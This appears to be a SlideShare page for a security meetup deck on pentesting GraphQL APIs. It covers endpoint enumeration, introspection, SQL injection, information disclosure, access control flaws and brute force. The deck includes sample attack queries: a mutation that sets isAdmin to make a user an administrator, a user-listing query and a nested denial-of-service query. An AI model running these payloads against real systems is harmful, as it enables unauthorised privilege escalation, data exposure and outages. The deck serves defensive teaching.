SlideShare a Scribd company logo
9
Most read
11
Most read
13
Most read
Pentest Application With
GraphQL
Presented By:
Divyanshu Shukla
(@justm0rph3u5)
@justm0rph3u5 @justm0rph3u5
Agenda
• What is GraphQL
• REST vs GraphQL
• Example for REST/GraphQL
• Architecture
• Basics
• Pentesting GraphQL
What Is GraphQL?
• New API standard that was invented and open-sourced by Facebook.
• GraphQL is a query language for APIs - not databases.
• It is database agnostic and effectively can be used in any context where an
API is used.
• GraphQL enables declarative data fetching.
• GraphQL is used in production by multiple companies such as GitHub,
Twitter, Coursera, etc.
REST vs GraphQL?
• Multiple Round Trips To Fetch Related Resources.
• Over Fetching / Under Fetching.
• Rapid Product Iterations on the Frontend.
• Benefits of a Schema & Type System
REST vs GraphQL Example
REST Example
GraphQL Example
Architecture
Ref: https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-vulnerabilities-5d39f26cea2e
Basics Terminology
• Schema Definition Language . Object Types & Fields
• Arguments . Aliases
• Fragments . Variables
• Directives
• Types of Requests:
oQuery
oMutations
oSubscriptions
Pentesting GraphQL
• Tools
• Enumeration
• Introspection
• SQL Injection
• Information Disclosure
• Broken Access Control
• Authorization Bypass
• Brute Force/Denial Of Service
Tools
• Altair GraphQL Client/GraphQL ide.
• GraphQL Raider (Burp Suite Extension).
• GraphQL_Introspection.py (Python script by Doyensec).
• GraphQL Vyoger (https://apis.guru/graphql-voyager/).
GraphQL Tip
• Pentesting an app that uses GraphQL? POST is more common, but
remember that it accepts GET too. URL encode & hit /graphql?query=. Eg,
a 'schema' request as GET:
https://example.com/graphql?query= {__schema%20{%0atypes%20{%0an
ame%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a}
Thanks to https://twitter.com/coffeetocode
Enumeration
• Look for traffic sent via server to find graphql endpoint.
o/graphql/
o/graphql/console/
o/graphql.php
o/graphiql/
o/graphiql.php
• Try sending a request to API and error is : “Syntax Error: Expected Name, found }”.
This confirms graphql.
• GraphQL endpoints may have a GUI, if present we can check Docs directly.
Introspection
• GraphQL allows querying to get metadata via introspection query to find
out about the schema with description of data.
• It is similar to information_schema tables in databases.
• It allows attacker to find what requests exist/what arguments should be
passed.
• GraphQL Introspection Query:
https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d
• Developers can disable this feature but majority of applications leave it
open.
• Hands-On : Hackerone
Ref: https://graphqlmastery.com/blog/graphql-introspection-
and-introspection-queries
Injection
• Most of the applications are connected with any database. So there is a
high chance for SQL injection, NoSQL injection and other injections.
• Detecting SQL injection and exploiting it using UNION SELECT.
• Also using sqlmap for exploitation.
• There are high chance that application may have multiple parameters
vulnerable to SQL injections.
• Example : https://blog.usejournal.com/time-based-blind-sql-injection-in-
graphql-39a25a1dfb3c
• Hands On: https://pentesterlab.com/exercises/graphql_ii/course
Information Disclosure
• GraphQL is just a layer between client apps and the database.
• Try visiting url/graphql.php?debug=1 to find debug mode and additional
error reporting.
• Inserting single quote/double quote to find out error related to server
and graphql.
• Going through the id values/userquery, we will be able to get information
about other users (or maybe not, if everything is configured correctly).
Broken Access Control
• Broken Access control may allow attacker use admin email and brute-force
login credentials to get admin level access.
• Steps to reproduce:
• Accessing other users profile details like id, email.
• Vulnerable graphql query:
query{
users{
id
email
isAdmin isActive } }
Authorization Bypass
• Suppose we can create users:
mutation {
createPerson (username: ”User1", password: ”user1") { } }
• Assuming that there is a certain isAdmin parameter in the handler on the
server, we can send a request of the form:
mutation {
createPerson (username: ”User1", password: ”user1", isAdmin: True) { } }
• And make the user User1 an administrator.
Brute Force/Denial Of Service
• Brute forcing email, id, etc parameters.
• Brute forcing mutation and other similar queries.
• Low privilege or non-admin user can view details by brute-forcing login
credentials where rate limiting is not present.
• Nested queries can cause denial of service to the application.
query {
stories{ title body comments{ comment author{ comments{ author{ comments{ comment author{ comments{
comment author{ comments{ comment author{ name }} }
} } }
} } }
} } }
Reference
• https://github.com/graphql/graphiql
• https://www.slideshare.net/NeeluTripathy2/pentesting-graphql-
applications
• https://prog.world/pentest-applications-with-graphql/
• https://www.howtographql.com
• https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli-
vulnerabilities-5d39f26cea2e
• https://blog.doyensec.com/2018/05/17/graphql-security-overview.html
• https://voidsec.com/graphql-security-overview-and-testing-tips/
• https://ctf.hacker101.com
• https://pentesterlab.com/exercises/graphql_ii/course
Pentest Application With GraphQL | Null Bangalore Meetup

More Related Content

What's hot (20)

PPTX
HTTP HOST header attacks
DefconRussia
 
PDF
Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities
Matt Tesauro
 
PPTX
Introduction to path traversal attack
Prashant Hegde
 
PPTX
Vulnerabilities in modern web applications
Niyas Nazar
 
PDF
How to identify and prevent SQL injection
Eguardian Global Services
 
PPTX
Security misconfiguration
Micho Hayek
 
PPT
Logical Attacks(Vulnerability Research)
Ajay Negi
 
PPTX
Host Header injection - Slides
Amit Dubey
 
PDF
Secure coding presentation Oct 3 2020
Moataz Kamel
 
PPTX
Pentesting ReST API
Nutan Kumar Panda
 
PPTX
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
PDF
Authorization Architecture Patterns: How to Avoid Pitfalls in #OAuth / #OIDC ...
Tatsuo Kudo
 
PPTX
Owasp Top 10 A1: Injection
Michael Hendrickx
 
PPTX
Ssrf
Ilan Mindel
 
PPTX
Getting Started with API Security Testing
SmartBear
 
PDF
OWASP API Security Top 10 Examples
42Crunch
 
PDF
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
Lenur Dzhemiliev
 
PDF
Burp suite
Yashar Shahinzadeh
 
PDF
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
PDF
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 
HTTP HOST header attacks
DefconRussia
 
Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities
Matt Tesauro
 
Introduction to path traversal attack
Prashant Hegde
 
Vulnerabilities in modern web applications
Niyas Nazar
 
How to identify and prevent SQL injection
Eguardian Global Services
 
Security misconfiguration
Micho Hayek
 
Logical Attacks(Vulnerability Research)
Ajay Negi
 
Host Header injection - Slides
Amit Dubey
 
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Pentesting ReST API
Nutan Kumar Panda
 
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
Authorization Architecture Patterns: How to Avoid Pitfalls in #OAuth / #OIDC ...
Tatsuo Kudo
 
Owasp Top 10 A1: Injection
Michael Hendrickx
 
Getting Started with API Security Testing
SmartBear
 
OWASP API Security Top 10 Examples
42Crunch
 
OWASP Top 10 Vulnerabilities - A5-Broken Access Control; A6-Security Misconfi...
Lenur Dzhemiliev
 
Burp suite
Yashar Shahinzadeh
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
Frans Rosén
 
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011)
Marco Balduzzi
 

Similar to Pentest Application With GraphQL | Null Bangalore Meetup (20)

PPTX
Attacking GraphQL
KavishaSheth1
 
PDF
APIsecure 2023 - Learn how to attack and mitigate vulnerabilities in GraphQL,...
apidays
 
PPTX
Working and Attacking GraphQL APIs vs Rest API
Matrix823409
 
PDF
GraphQL Bangkok meetup 5.0
Tobias Meixner
 
PDF
APIsecure 2023 - Discovering GraphQL Vulnerabilities in the Wild, Tristan Kal...
apidays
 
PPTX
Introduction to Testing GraphQL Presentation
Knoldus Inc.
 
PPTX
Testing Graph QL Presentation (Test Automation)
Knoldus Inc.
 
PPTX
GraphQL - an elegant weapon... for more civilized age
Bartosz Sypytkowski
 
PDF
GraphQL the holy contract between client and server
Pavel Chertorogov
 
PDF
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetup
Davide Cioccia
 
PPTX
React inter3
Oswald Campesato
 
PPTX
Introduction to Graph QL
Deepak More
 
PDF
Pentesting GraphQL Applications For Fun and Profit - Pranav Hivarekar
Pranav Hivarekar
 
PDF
Introduction to GraphQL for beginners
Martin Pham
 
PPT
Graphql presentation
Vibhor Grover
 
PDF
GraphQL as a REST API alternative
Kamil Rykowski
 
PDF
Graphql
Niv Ben David
 
PPTX
Introduction to GraphQL
Rodrigo Prates
 
PDF
APIdays Paris 2018 - Secure & Manage APIs with GraphQL, Ozair Sheikh, Directo...
apidays
 
PPTX
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)
Shift Conference
 
Attacking GraphQL
KavishaSheth1
 
APIsecure 2023 - Learn how to attack and mitigate vulnerabilities in GraphQL,...
apidays
 
Working and Attacking GraphQL APIs vs Rest API
Matrix823409
 
GraphQL Bangkok meetup 5.0
Tobias Meixner
 
APIsecure 2023 - Discovering GraphQL Vulnerabilities in the Wild, Tristan Kal...
apidays
 
Introduction to Testing GraphQL Presentation
Knoldus Inc.
 
Testing Graph QL Presentation (Test Automation)
Knoldus Inc.
 
GraphQL - an elegant weapon... for more civilized age
Bartosz Sypytkowski
 
GraphQL the holy contract between client and server
Pavel Chertorogov
 
Avoiding GraphQL insecurities with OWASP SKF - OWASP HU meetup
Davide Cioccia
 
React inter3
Oswald Campesato
 
Introduction to Graph QL
Deepak More
 
Pentesting GraphQL Applications For Fun and Profit - Pranav Hivarekar
Pranav Hivarekar
 
Introduction to GraphQL for beginners
Martin Pham
 
Graphql presentation
Vibhor Grover
 
GraphQL as a REST API alternative
Kamil Rykowski
 
Graphql
Niv Ben David
 
Introduction to GraphQL
Rodrigo Prates
 
APIdays Paris 2018 - Secure & Manage APIs with GraphQL, Ozair Sheikh, Directo...
apidays
 
Shift Remote: WEB - GraphQL and React – Quick Start - Dubravko Bogovic (Infobip)
Shift Conference
 
Ad

Recently uploaded (20)

PDF
People & Earth's Ecosystem -Lesson 2: People & Population
marvinnbustamante1
 
PPTX
A PPT on Alfred Lord Tennyson's Ulysses.
Beena E S
 
PDF
ARAL-Orientation_Morning-Session_Day-11.pdf
JoelVilloso1
 
PDF
Generative AI: it's STILL not a robot (CIJ Summer 2025)
Paul Bradshaw
 
PDF
Women's Health: Essential Tips for Every Stage.pdf
Iftikhar Ahmed
 
PPTX
MENINGITIS: NURSING MANAGEMENT, BACTERIAL MENINGITIS, VIRAL MENINGITIS.pptx
PRADEEP ABOTHU
 
PPSX
HEALTH ASSESSMENT (Community Health Nursing) - GNM 1st Year
Priyanshu Anand
 
PDF
Chapter-V-DED-Entrepreneurship: Institutions Facilitating Entrepreneurship
Dayanand Huded
 
PDF
The dynastic history of the Chahmana.pdf
PrachiSontakke5
 
PDF
LAW OF CONTRACT ( 5 YEAR LLB & UNITARY LLB)- MODULE-3 - LEARN THROUGH PICTURE
APARNA T SHAIL KUMAR
 
PPTX
STAFF DEVELOPMENT AND WELFARE: MANAGEMENT
PRADEEP ABOTHU
 
PPTX
ASRB NET 2023 PREVIOUS YEAR QUESTION PAPER GENETICS AND PLANT BREEDING BY SAT...
Krashi Coaching
 
PDF
The Different Types of Non-Experimental Research
Thelma Villaflores
 
PDF
Reconstruct, Restore, Reimagine: New Perspectives on Stoke Newington’s Histor...
History of Stoke Newington
 
PPTX
How to Convert an Opportunity into a Quotation in Odoo 18 CRM
Celine George
 
PDF
community health nursing question paper 2.pdf
Prince kumar
 
PPTX
Unit 2 COMMERCIAL BANKING, Corporate banking.pptx
AnubalaSuresh1
 
PPT
Talk on Critical Theory, Part One, Philosophy of Social Sciences
Soraj Hongladarom
 
PPTX
2025 Winter SWAYAM NPTEL & A Student.pptx
Utsav Yagnik
 
PDF
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - GLOBAL SUCCESS - CẢ NĂM - NĂM 2024 (VOCABULARY, ...
Nguyen Thanh Tu Collection
 
People & Earth's Ecosystem -Lesson 2: People & Population
marvinnbustamante1
 
A PPT on Alfred Lord Tennyson's Ulysses.
Beena E S
 
ARAL-Orientation_Morning-Session_Day-11.pdf
JoelVilloso1
 
Generative AI: it's STILL not a robot (CIJ Summer 2025)
Paul Bradshaw
 
Women's Health: Essential Tips for Every Stage.pdf
Iftikhar Ahmed
 
MENINGITIS: NURSING MANAGEMENT, BACTERIAL MENINGITIS, VIRAL MENINGITIS.pptx
PRADEEP ABOTHU
 
HEALTH ASSESSMENT (Community Health Nursing) - GNM 1st Year
Priyanshu Anand
 
Chapter-V-DED-Entrepreneurship: Institutions Facilitating Entrepreneurship
Dayanand Huded
 
The dynastic history of the Chahmana.pdf
PrachiSontakke5
 
LAW OF CONTRACT ( 5 YEAR LLB & UNITARY LLB)- MODULE-3 - LEARN THROUGH PICTURE
APARNA T SHAIL KUMAR
 
STAFF DEVELOPMENT AND WELFARE: MANAGEMENT
PRADEEP ABOTHU
 
ASRB NET 2023 PREVIOUS YEAR QUESTION PAPER GENETICS AND PLANT BREEDING BY SAT...
Krashi Coaching
 
The Different Types of Non-Experimental Research
Thelma Villaflores
 
Reconstruct, Restore, Reimagine: New Perspectives on Stoke Newington’s Histor...
History of Stoke Newington
 
How to Convert an Opportunity into a Quotation in Odoo 18 CRM
Celine George
 
community health nursing question paper 2.pdf
Prince kumar
 
Unit 2 COMMERCIAL BANKING, Corporate banking.pptx
AnubalaSuresh1
 
Talk on Critical Theory, Part One, Philosophy of Social Sciences
Soraj Hongladarom
 
2025 Winter SWAYAM NPTEL & A Student.pptx
Utsav Yagnik
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - GLOBAL SUCCESS - CẢ NĂM - NĂM 2024 (VOCABULARY, ...
Nguyen Thanh Tu Collection
 
Ad

Pentest Application With GraphQL | Null Bangalore Meetup

  • 1. Pentest Application With GraphQL Presented By: Divyanshu Shukla (@justm0rph3u5) @justm0rph3u5 @justm0rph3u5
  • 2. Agenda • What is GraphQL • REST vs GraphQL • Example for REST/GraphQL • Architecture • Basics • Pentesting GraphQL
  • 3. What Is GraphQL? • New API standard that was invented and open-sourced by Facebook. • GraphQL is a query language for APIs - not databases. • It is database agnostic and effectively can be used in any context where an API is used. • GraphQL enables declarative data fetching. • GraphQL is used in production by multiple companies such as GitHub, Twitter, Coursera, etc.
  • 4. REST vs GraphQL? • Multiple Round Trips To Fetch Related Resources. • Over Fetching / Under Fetching. • Rapid Product Iterations on the Frontend. • Benefits of a Schema & Type System
  • 5. REST vs GraphQL Example
  • 9. Basics Terminology • Schema Definition Language . Object Types & Fields • Arguments . Aliases • Fragments . Variables • Directives • Types of Requests: oQuery oMutations oSubscriptions
  • 10. Pentesting GraphQL • Tools • Enumeration • Introspection • SQL Injection • Information Disclosure • Broken Access Control • Authorization Bypass • Brute Force/Denial Of Service
  • 11. Tools • Altair GraphQL Client/GraphQL ide. • GraphQL Raider (Burp Suite Extension). • GraphQL_Introspection.py (Python script by Doyensec). • GraphQL Vyoger (https://apis.guru/graphql-voyager/).
  • 12. GraphQL Tip • Pentesting an app that uses GraphQL? POST is more common, but remember that it accepts GET too. URL encode & hit /graphql?query=. Eg, a 'schema' request as GET: https://example.com/graphql?query= {__schema%20{%0atypes%20{%0an ame%0akind%0adescription%0afields%20{%0aname%0a}%0a}%0a}%0a} Thanks to https://twitter.com/coffeetocode
  • 13. Enumeration • Look for traffic sent via server to find graphql endpoint. o/graphql/ o/graphql/console/ o/graphql.php o/graphiql/ o/graphiql.php • Try sending a request to API and error is : “Syntax Error: Expected Name, found }”. This confirms graphql. • GraphQL endpoints may have a GUI, if present we can check Docs directly.
  • 14. Introspection • GraphQL allows querying to get metadata via introspection query to find out about the schema with description of data. • It is similar to information_schema tables in databases. • It allows attacker to find what requests exist/what arguments should be passed. • GraphQL Introspection Query: https://gist.github.com/a7v8x/c30d92d2ca2458035aadc41702da367d • Developers can disable this feature but majority of applications leave it open. • Hands-On : Hackerone Ref: https://graphqlmastery.com/blog/graphql-introspection- and-introspection-queries
  • 15. Injection • Most of the applications are connected with any database. So there is a high chance for SQL injection, NoSQL injection and other injections. • Detecting SQL injection and exploiting it using UNION SELECT. • Also using sqlmap for exploitation. • There are high chance that application may have multiple parameters vulnerable to SQL injections. • Example : https://blog.usejournal.com/time-based-blind-sql-injection-in- graphql-39a25a1dfb3c • Hands On: https://pentesterlab.com/exercises/graphql_ii/course
  • 16. Information Disclosure • GraphQL is just a layer between client apps and the database. • Try visiting url/graphql.php?debug=1 to find debug mode and additional error reporting. • Inserting single quote/double quote to find out error related to server and graphql. • Going through the id values/userquery, we will be able to get information about other users (or maybe not, if everything is configured correctly).
  • 17. Broken Access Control • Broken Access control may allow attacker use admin email and brute-force login credentials to get admin level access. • Steps to reproduce: • Accessing other users profile details like id, email. • Vulnerable graphql query: query{ users{ id email isAdmin isActive } }
  • 18. Authorization Bypass • Suppose we can create users: mutation { createPerson (username: ”User1", password: ”user1") { } } • Assuming that there is a certain isAdmin parameter in the handler on the server, we can send a request of the form: mutation { createPerson (username: ”User1", password: ”user1", isAdmin: True) { } } • And make the user User1 an administrator.
  • 19. Brute Force/Denial Of Service • Brute forcing email, id, etc parameters. • Brute forcing mutation and other similar queries. • Low privilege or non-admin user can view details by brute-forcing login credentials where rate limiting is not present. • Nested queries can cause denial of service to the application. query { stories{ title body comments{ comment author{ comments{ author{ comments{ comment author{ comments{ comment author{ comments{ comment author{ name }} } } } } } } } } } }
  • 20. Reference • https://github.com/graphql/graphiql • https://www.slideshare.net/NeeluTripathy2/pentesting-graphql- applications • https://prog.world/pentest-applications-with-graphql/ • https://www.howtographql.com • https://medium.com/@localh0t/discovering-graphql-endpoints-and-sqli- vulnerabilities-5d39f26cea2e • https://blog.doyensec.com/2018/05/17/graphql-security-overview.html • https://voidsec.com/graphql-security-overview-and-testing-tips/ • https://ctf.hacker101.com • https://pentesterlab.com/exercises/graphql_ii/course